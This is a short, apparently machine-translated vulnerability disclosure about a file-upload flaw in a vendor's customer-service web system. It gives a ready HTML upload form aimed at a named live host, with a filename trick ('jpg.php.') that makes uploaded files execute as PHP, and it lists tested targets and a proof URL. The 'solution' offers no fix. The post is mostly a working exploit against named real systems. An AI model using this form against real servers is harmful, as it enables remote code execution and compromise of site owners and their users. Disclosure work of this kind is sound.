Another File Upload Vulnerability in the customer service system of the ufida icc website looked at the previous vulnerability: http://www.bkjia.com/article/201206/136635.html.
Details: vulnerabilities are detected on multiple websites.
/Home/ecccs/web/5107/upload/screenImagesSave. php
For more information, see the source code.
<Form enctype = "multipart/form-data" method = "post"
Action = "http://icc.5107.cn/5107/upload/screenImagesSave.php? Filename = jpg. php. ">
<Input type = "file" name = "file">
<Input type = "submit" name = "up" value = "Upload">
</Form>
The last one is jpg. php. This one is added after jpg. php, so it can be parsed after upload.
Http://www.bkjia.com/xxx. php. can be resolved to php like this.
Tested:
Http://icc.5107.cn/
Proof of vulnerability: http://icc.5107.cn/data/guige.txt
Solution:
You know!
Author: ghost Brother